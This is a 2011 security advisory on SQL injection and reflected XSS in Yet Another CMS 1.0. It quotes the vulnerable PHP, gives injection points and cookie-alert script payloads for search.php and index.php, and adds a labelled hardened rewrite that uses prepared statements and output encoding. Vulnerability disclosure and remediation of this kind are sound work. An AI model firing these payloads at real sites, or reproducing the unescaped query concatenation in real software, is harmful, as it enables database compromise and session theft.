SSCHADV2011-031 - Yet Another CMS 1.0 SQL Injection & XSS vulnerabilities
Advisory: Yet Another CMS 1.0 SQL Injection & XSS vulnerabilities
Advisory ID: SSCHADV2011-031
Author: Stefan Schurtz
Affected Software: Successfully tested on Yet Another CMS 1.0
Vendor URL:
Vendor Status: informed
EDB-ID: 17997
======================
Vulnerability Description:
======================
Yet Another CMS 1.0 is prone to multiple SQL Injection and XSS vulnerabilities
==============
Technical Details:
==============
// search.php
$result_set = get_search_result_set($_POST['pattern']);
// includes/functions.php
function get_search_result_set($pattern, $public = true) {
    global $connection;
    // $pattern comes straight from $_POST and is concatenated into the query unescaped
    $query = "SELECT id, subject_id, menu_name, position, visible, content, CONCAT('… ', SUBSTRING(content, LOCATE('" . $pattern . "',content), 200), ' …') as fragment FROM pages WHERE content like '" . $pattern . "'";
// index.php
<?php find_selected_page(); ?>
// includes/functions.php
function find_selected_page() {
    global $sel_subject;
    global $sel_page;
    if (isset($_GET['subj'])) {
        $sel_subject = get_subject_by_id($_GET['subj']);
        $sel_page = get_default_page($sel_subject['id']);
    } elseif (isset($_GET['page'])) {
        $sel_subject = NULL;
        $sel_page = get_page_by_id($_GET['page']);
    } else {
        $sel_subject = NULL;
        $sel_page = NULL;
    }
}
function get_page_by_id($page_id) {
    global $connection;
    // $page_id comes straight from $_GET['page'] and is concatenated into the query unescaped
    $query = "SELECT * ";
    $query .= "FROM pages ";
    $query .= "WHERE id=" . $page_id ." ";
    $query .= "LIMIT 1";
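A hardened rewrite of the two functions shown above, added here as an illustration and not taken from the Yet Another CMS code base: it assumes $connection is a mysqli handle (the advisory does not show how the CMS connects), binds the page id and the search pattern as query parameters instead of concatenating them, and HTML-encodes values before they are echoed, which closes the reflected XSS on the same inputs.

```php
<?php
// Added example, not code from Yet Another CMS. Assumes $connection is a
// mysqli handle; the advisory does not show how the CMS opens its connection.

// index.php?page=<id>: validate the id and bind it instead of concatenating it.
function get_page_by_id_safe(mysqli $connection, $page_id) {
    $id = filter_var($page_id, FILTER_VALIDATE_INT);
    if ($id === false) {
        return null;                      // non-numeric input never reaches SQL
    }
    $stmt = $connection->prepare("SELECT * FROM pages WHERE id = ? LIMIT 1");
    $stmt->bind_param("i", $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// search.php: the pattern appears twice (LOCATE and LIKE), so it is bound twice.
// $public is kept only for signature compatibility; its use is not shown above.
function get_search_result_set_safe(mysqli $connection, $pattern, $public = true) {
    $query = "SELECT id, subject_id, menu_name, position, visible, content, "
           . "CONCAT('… ', SUBSTRING(content, LOCATE(?, content), 200), ' …') AS fragment "
           . "FROM pages WHERE content LIKE ?";
    $stmt = $connection->prepare($query);
    $stmt->bind_param("ss", $pattern, $pattern);
    $stmt->execute();
    $rows = $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
    $stmt->close();
    return $rows;
}

// Output side, for the reflected XSS: HTML-encode anything echoed back
// (the search pattern, the page id, the fragment) before it enters the page.
function h($value) {
    return htmlspecialchars((string) $value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Usage sketch for search.php:
// $results = get_search_result_set_safe($connection, $_POST['pattern'] ?? '');
// echo '<p>Results for ' . h($_POST['pattern'] ?? '') . '</p>';
// foreach ($results as $r) { echo '<div>' . h($r['fragment']) . '</div>'; }
```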
==============
Exploit
==============
SQL Injection
http://<target>/index.php?page=[sql injection]
http://<target>/search.php -> 'search field' -> [sql injection]
XSS
http://<target>/search.php -> 'search field' -> '"</script><script>alert(document.cookie)</script>
http://<target>/index.php?page='</script><script>alert(document.cookie)</script>
=====
Solution:
=====
-
================
Disclosure Timeline:
================
18-Oct-2011 – informed developers
18-Oct-2011 – release date of this security advisory
18-Oct-2011 – post on BugTraq
====
Credits:
====
Vulnerabilities found and advisory written by Stefan Schurtz.
=======
References:
=======
http://yetanothercms.codeplex.com/
http://yetanothercms.codeplex.com/workitem/643
http://www.rul3z.de/advisories/SSCHADV2011-031.txt